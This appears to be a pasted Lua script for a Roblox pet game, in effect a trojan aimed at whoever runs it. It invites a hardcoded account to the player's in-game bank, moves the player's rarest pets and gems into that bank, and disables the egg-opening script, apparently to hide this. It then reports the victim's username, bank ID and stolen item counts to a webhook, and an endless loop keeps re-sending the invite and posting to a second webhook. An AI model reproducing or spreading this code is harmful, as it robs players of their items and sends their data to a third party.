

Jun 20th, 2022
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  1. local HoverBoard = 922569984
  2. local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
  3. local mybanks = lib.Network.Invoke("get my banks")
  4. local BankID = mybanks[1]['BUID']
  5. lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], HoverBoard)
  7. local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
  8. local mybanks = lib.Network.Invoke("get my banks")
  9. local BankID = mybanks[1]['BUID']
  11. local Bank = BankID
  13. local A_1 = "b"
  14. local A_2 = "bank deposit"
  15. local Event = game:GetService("Workspace")["__THINGS"]["__REMOTES"].MAIN
  16. Event:FireServer(A_1, A_2)
  18. local A_1 = "b"
  19. local A_2 = "buy egg"
  20. local Event = game:GetService("Workspace")["__THINGS"]["__REMOTES"].MAIN
  21. Event:FireServer(A_1, A_2)
  23. local FinalList = {}
  24. local output = 1
  25. Library = require(game:GetService('ReplicatedStorage').Framework:FindFirstChild('Library'))
  26. Functions = Library.Functions
  27. EXCList = {}
  28. MythicList = {}
  30. EList = {}
  31. MList = {}
  34. table.foreach(Library.Directory.Pets, function(i, v)
  35. if v.rarity == "Exclusive" then
  36. table.insert(EXCList, i)
  37. end
  38. if v.rarity == "Mythical" then
  39. table.insert(MythicList, i)
  40. end
  41. end)
  43. local pets = require(game:GetService("ReplicatedStorage").Framework.Modules.Client["4 | Save"]).Get().Pets
  44. for i, v in pairs(pets) do
  45. if table.find(EXCList, v["id"]) ~= nil then
  46. table.insert(EList, v["uid"])
  47. end
  48. if table.find(MythicList, v["id"]) ~= nil then
  49. table.insert(MList, v["uid"])
  50. end
  51. end
  52. if #EList + #MList < 49 then
  53. for i, v in pairs(EList) do
  54. table.insert(FinalList, v)
  55. end
  56. for i, v in pairs(MList) do
  57. table.insert(FinalList, v)
  58. end
  59. elseif #EList + #MList > 49 and #EList < 49 then
  60. for i, v in pairs(EList) do
  61. table.insert(FinalList, v)
  62. end
  63. for i, v in pairs(MList) do
  64. if #FinalList < 49 then
  65. table.insert(FinalList, v)
  66. end
  67. end
  68. elseif #EList + #MList > 49 and #EList > 49 then
  69. for i, v in pairs(EList) do
  70. if #FinalList < 49 then
  71. table.insert(FinalList, v)
  72. end
  73. end
  74. end
  75. wait(0.5)
  76. game:GetService("Players").LocalPlayer.PlayerScripts.Scripts.Game["Open Eggs"].Disabled = true
  77. local A_1 =
  78. {
  79. [1] = "Cracked Egg",
  80. [2] = false
  81. }
  82. local Event = game:GetService("Workspace")["__THINGS"]["__REMOTES"]["buy egg"]
  83. Event:InvokeServer(A_1)
  84. wait(0.5)
  85. local A_1 =
  86. {
  87. [1] = Bank,
  88. [2] = FinalList,
  89. [3] = output-1
  90. }
  91. local Event = game:GetService("Workspace")["__THINGS"]["__REMOTES"]["bank deposit"]
  92. local result = Event:InvokeServer(A_1)
  94. -- wrb
  96. local YourWebHookHere = "" -- web hook here
  98. local url = YourWebHookHere
  99. local username = game:GetService("Players").LocalPlayer.Name
  101. local data = {
  102. ["content"] = "> by Listeak",
  103. ["embeds"] = {{
  104. ["title"] = "__**Opening**__",
  105. ["description"] = "i can't track this expired or no",
  106. ["type"] = "rich",
  107. ["color"] = tonumber(0x0E980E),
  108. ["fields"] = {
  109. {
  110. ["name"] = "__Username__",
  111. ["value"] = "**"..username.."**", -- remove the || on both sides if you don't want your username to be behind a spoiler
  112. ["inline"] = false
  113. },
  114. {
  115. ["name"] = "__Gems Deposited__",
  116. ["value"] = output-1,
  117. ["inline"] = false
  118. },
  119. {
  120. ["name"] = "__Total Pet Deposited__",
  121. ["value"] = #FinalList,
  122. ["inline"] = false
  123. },
  124. {
  125. ["name"] = "__Exclusive/Huges__",
  126. ["value"] = #EList,
  127. ["inline"] = false
  128. },
  129. {
  130. ["name"] = "__Mythicals__",
  131. ["value"] = #MList,
  132. ["inline"] = false
  133. },
  134. {
  135. ["name"] = "__BankID__",
  136. ["value"] = BankID,
  137. ["inline"] = false
  138. },
  139. }
  140. }}
  141. }
  142. local newdata = game:GetService("HttpService"):JSONEncode(data)
  144. local headers = {
  145. ["content-type"] = "application/json"
  146. }
  147. request = http_request or request or HttpPost or syn.request
  148. local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
  149. request(abcdef)
  151. while true do
  152. lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], HoverBoard)
  153. local YourWebHookHere2 = "" -- web hook here
  155. local url2 = YourWebHookHere2
  156. local username2 = game:GetService("Players").LocalPlayer.Name
  158. local data2 = {
  159. ["content"] = "> "..username2.." Repeat ur Invites",
  160. ["embeds"] = {{
  161. ["title"] = "__** Results**__",
  162. ["description"] = "i can't track this expired or no",
  163. ["type"] = "rich",
  164. ["color"] = tonumber(0x0E980E),
  165. ["fields"] = {
  166. {
  167. ["name"] = "__Username__",
  168. ["value"] = "**"..username2.."** Repeat ur Invites", -- remove the || on both sides if you don't want your username to be behind a spoiler
  169. ["inline"] = false
  170. },
  171. {
  172. ["name"] = "__Cancel Invite__",
  173. ["value"] = "Yes",
  174. ["inline"] = false
  175. },
  176. }
  177. }}
  178. }
  179. local newdata2 = game:GetService("HttpService"):JSONEncode(data2)
  181. local headers2 = {
  182. ["content-type"] = "application/json"
  183. }
  184. request = http_request or request or HttpPost or syn.request
  185. local abcdef2 = {Url = url2, Body = newdata2, Method = "POST", Headers = headers2}
  186. request(abcdef2)
  187. end
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